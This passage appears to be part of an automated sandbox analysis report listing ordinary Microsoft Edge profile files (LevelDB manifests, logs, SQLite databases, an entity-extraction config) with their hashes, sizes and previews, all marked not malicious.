Encrypted:	false
SSDEEP:	3:LsNl1kK:Ls3p
MD5:	D046ECDC683E2FA3C2D52691923503B5
SHA1:	F8827DABB6C4E17373FEEF4E2CB5A5CB9060451F
SHA-256:	097C5EE8E5C39FAE69626F050A88B5634BE28239A87C41E760D0F72660097CD2
SHA-512:	7627318E41FDB9873CF34907AC8BC4B378E88D90AABBEB626E47B7442DE247972425126651654F65FF2C5E1E07D142198AC940A0BC2E2CB9446AA2039612AE75
Malicious:	false
Preview:	.........................................R:.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\EdgeCoupons\coupons_data.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\EdgeCoupons\coupons_data.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	33
Entropy (8bit):	3.5394429593752084
Encrypted:	false
SSDEEP:	3:iWstvhYNrkUn:iptAd
MD5:	F27314DD366903BBC6141EAE524B0FDE
SHA1:	4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
SHA-256:	68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
SHA-512:	07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
Malicious:	false
Preview:	...m.................DB_VERSION.1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\EdgeCoupons\coupons_data.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\EdgeEDrop\EdgeEDropSQLite.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 14, database pages 8, cookie 0xe, schema 4, UTF-8, version-valid-for 14
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.494709561094235
Encrypted:	false
SSDEEP:	24:TLEC30OIcqIn2o0FUFlA2cs0US5S693Xlej2:ThLaJUnAg0UB6I
MD5:	CF7760533536E2AF66EA68BC3561B74D
SHA1:	E991DE2EA8F42AE7E0A96A3B3B8AF87A689C8CCD
SHA-256:	E1F183FAE5652BA52F5363A7E28BF62B53E7781314C9AB76B5708AF9918BE066
SHA-512:	38B15FE7503F6DFF9D39BC74AA0150A7FF038029F973BE9A37456CDE6807BCBDEAB06E624331C8DFDABE95A5973B0EE26A391DB2587E614A37ADD50046470162
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...i............t...c................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5094712832659277
Encrypted:	false
SSDEEP:	12:TLW4QpRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7me5q4iZ7dV:TLqpR+DDNzWjJ0npnyXKUO8+j25XmL
MD5:	D4971855DD087E30FC14DF1535B556B9
SHA1:	9E00DEFC7E54C75163273184837B9D0263AA528C
SHA-256:	EC7414FF1DB052E8E0E359801F863969866F19228F3D5C64F632D991C923F0D2
SHA-512:	ACA411D7819B03EF9C9ACA292D91B1258238DF229B4E165A032DB645E66BFE1148FF3DCFDAC3126FCD34DBD0892F420148E280D9716C63AD9FCDD9E7CA58D71D
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	375520
Entropy (8bit):	5.354166018283757
Encrypted:	false
SSDEEP:	6144:cA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:cFdMyq49tEndBuHltBfdK5WNbsVEziPU
MD5:	EE0ACA9F48A3C5A5632154641B207486
SHA1:	5B02189A3C2DFA86B622CFF7C84921475441C106
SHA-256:	6B1BC2CC6FBF2E40FBB3464499D9E93278A00F6AD03FF96759B2C5576CEBF0D0
SHA-512:	77BC73989C3D1C0C6EE5B2C49D235EFE3688CE71CC74C78F9C65989EA082114F4B3E713B9636038201053E9A369DE58837B03D0F2D4F7C7819C7050671BCFBDA
Malicious:	false
Preview:	...m.................DB_VERSION.1....q...............&QUERY_TIMESTAMP:domains_config_gz2...13369638497850808..QUERY:domains_config_gz2....[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	323
Entropy (8bit):	5.184554019308555
Encrypted:	false
SSDEEP:	6:PIU4lB1923oH+Tcwtj2WwnvB2KLllIh8lwQ+q2P923oH+Tcwtj2WwnvIFUv:PIUEMYebjxwnvFLnIKlIv4YebjxwnQF2
MD5:	38959BB7C4184F5E46BC7B75AACDEA62
SHA1:	5E1801CBC9E16A105B32CF18A03F5DB02943F8DA
SHA-256:	1C9887F79C1F87E4E3E633FF501153DA111B5959B41501F50A28D51A7F901979
SHA-512:	B7ADD9807DEE9DA49475334A1E56CD4C37AEB32AD1B29C66B621481006C4D7DB251FB116E341A40D1EAC265992510D026299D5DF0AC7B6A348CC48D28B07D36C
Malicious:	false
Preview:	2024/09/01-00:28:16.995 22b8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\EntityExtractionAssetStore.db since it was missing..2024/09/01-00:28:17.180 22b8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\EntityExtraction\domains_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	358860
Entropy (8bit):	5.324618321205688
Encrypted:	false
SSDEEP:	6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rn:C1gAg1zfv/
MD5:	9AAD70F35437DA10DA2B7A7E9CB2CDE8
SHA1:	6D038A841189B85FEAD0729DF5EC51164447C1AA
SHA-256:	555AA4FE47037B3DA326CA1586D2DE1158D5E46D308403D0652F2DDA7E2FA757
SHA-512:	FC1BBB230C3CCED48AEAEACFDF4510987786AA16CE03FBEB49CDF0DB2347DED6302FA5F9ADD0AEF9BE3569FD149DAB5EEB25B7CD3FB3FA0561681B3B474C691D
Malicious:	false
Preview:	{"aee_config":{"ar":{"price_regex":{"ae":"(((ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)))","dz":"(((dzd\|da\|\\x{062F}\\x{062C})\\s\\d{1,3})\|(\\d{1,3}\\s(dzd\|da\|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}\|egp)\\s\\d{1,3})\|(\\d{1,3}\\s(e\\x{00a3}\|egp)))","ma":"(((mad\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(mad\|dhs\|dh)))","sa":"((\\d{1,3}\\s(sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633}))\|((sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633})\\s\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})\|(\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})\|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})\|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Extension Rules\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Extension Rules\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	171
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCT
MD5:	E952942B492DB39A75DD2669B98EBE74
SHA1:	F6C4DEF325DCA0DFEC01759D7D8610837A370176
SHA-256:	14F92B911F9FE774720461EEC5BB4761AE6BFC9445C67E30BF624A8694B4B1DA
SHA-512:	9193E7BBE7EB633367B39513B48EFED11FD457DCED070A8708F8572D0AB248CBFF37254599A6BFB469637E0DCCBCD986347C6B6075C06FAE2AF08387B560DEA0
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Extension Rules\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Extension Rules\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.15362015306382
Encrypted:	false
SSDEEP:	6:PIQpQwEq1923oH+TcwttaVdg2KLllIQpFAVq2P923oH+TcwttaPrqIFUv:PIQpQxfYebDLnIQpGv4Yeb83FUv
MD5:	67C09A7249750C963FD672535A91E3AF
SHA1:	232FE4374B222C75E2FE49AFF985889A79226F31
SHA-256:	99A2847B81E7F40D9DBB7CEB06DFE5A0D949F14FCE4D16C03A4D9A272CD44B6C
SHA-512:	007369A6B06158C665FDCEDD975B4F5E6121E2DEA3F5C5C6E2C8AD661CAF56FAC57BED1150AFCB2C80D959CF8891A61A4B31EC3FC0B5DC4C9B46643FE1EE2DED
Malicious:	false
Preview:	2024/09/01-00:28:12.869 1d40 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Extension Rules since it was missing..2024/09/01-00:28:12.883 1d40 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Extension Rules/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Extension Rules\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Extension Scripts\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Extension Scripts\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	171
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCT
MD5:	E952942B492DB39A75DD2669B98EBE74
SHA1:	F6C4DEF325DCA0DFEC01759D7D8610837A370176
SHA-256:	14F92B911F9FE774720461EEC5BB4761AE6BFC9445C67E30BF624A8694B4B1DA
SHA-512:	9193E7BBE7EB633367B39513B48EFED11FD457DCED070A8708F8572D0AB248CBFF37254599A6BFB469637E0DCCBCD986347C6B6075C06FAE2AF08387B560DEA0
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Extension Scripts\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Extension Scripts\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	299
Entropy (8bit):	5.145642705387202
Encrypted:	false
SSDEEP:	6:PIQpzdEq1923oH+Tcwtt6FB2KLllIQpTAVq2P923oH+Tcwtt65IFUv:PIQpqfYeb8FFLnIQp0v4Yeb8WFUv
MD5:	767F7D29932AFD0EF80CD9A81F709121
SHA1:	D1451AE4E9B2CDDE9B63A0379D73EC1156855949
SHA-256:	59BBB651BF7DF79556FE3A829A9C66363AF05EDE6690F63C8F63ADFFEB6BCB90
SHA-512:	3ED45DD56AB07CE0144876857156A1FAE9F35116E44D76DCDDCF33375FB41D137F4C162BC6781CAB610A63D584941B648E5AA5CA2316E9B31AEEA8EBC7666BD0
Malicious:	false
Preview:	2024/09/01-00:28:12.885 1d40 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Extension Scripts since it was missing..2024/09/01-00:28:12.896 1d40 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Extension Scripts/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Extension Scripts\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Extension State\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Extension State\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	513
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWWWWWWW
MD5:	C92EABB217D45C77F8D52725AD3758F0
SHA1:	43B422AC002BB445E2E9B2C27D74C27CD70C9975
SHA-256:	388C5C95F0F54F32B499C03A37AABFA5E0A31030EC70D0956A239942544B0EEA
SHA-512:	DFD5D1C614F0EBFF97F354DFC23266655C336B9B7112781D7579057814B4503D4B63AB1263258BDA3358E5EE9457429C1A2451B22261A1F1E2D8657F31240D3C
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Extension State\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Extension State\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.156281789746975
Encrypted:	false
SSDEEP:	6:PIt481923oH+TcwttYg2KLllItnQ0+q2P923oH+TcwttNIFUv:PIOxYebJLnIRQ0+v4Yeb0FUv
MD5:	3CC1CDB20EA2C72D55B3618F1C357777
SHA1:	77B01C5674BA4A6AEBBC96AE7BF459DF6206798F
SHA-256:	BA24DF19B52B45ECA28CE95F31737267BFAC0B8053BE3F285C925334756887C9
SHA-512:	99590474DABF96E8CF209BE1E0FE4A8928C3702254CF3CF85A52F172FACA028F462120022526ECB177FA6DA3BE8DAD87B541AF9B97F0754480F20827580C8478
Malicious:	false
Preview:	2024/09/01-00:28:13.704 1d3c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Extension State since it was missing..2024/09/01-00:28:13.715 1d3c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Extension State/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\Extension State\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data Kiosk\Default\ExtensionActivityComp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 1, cookie 0x1, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.3169096321222068
Encrypted:	false
SSDEEP:	3:lSWbNFl/sl+ltl4ltllOl83/XWEEabIDWzdWuAzTgdWj3FtFIU:l9bNFlEs1ok8fDEPDadUTgd81Z
MD5:	2554AD7847B0D04963FDAE908DB81074
SHA1:	F84ABD8D05D7B0DFB693485614ECF5204989B74A
SHA-256:	F6EF01E679B9096A7D8A0BD8151422543B51E65142119A9F3271F25F966E6C42
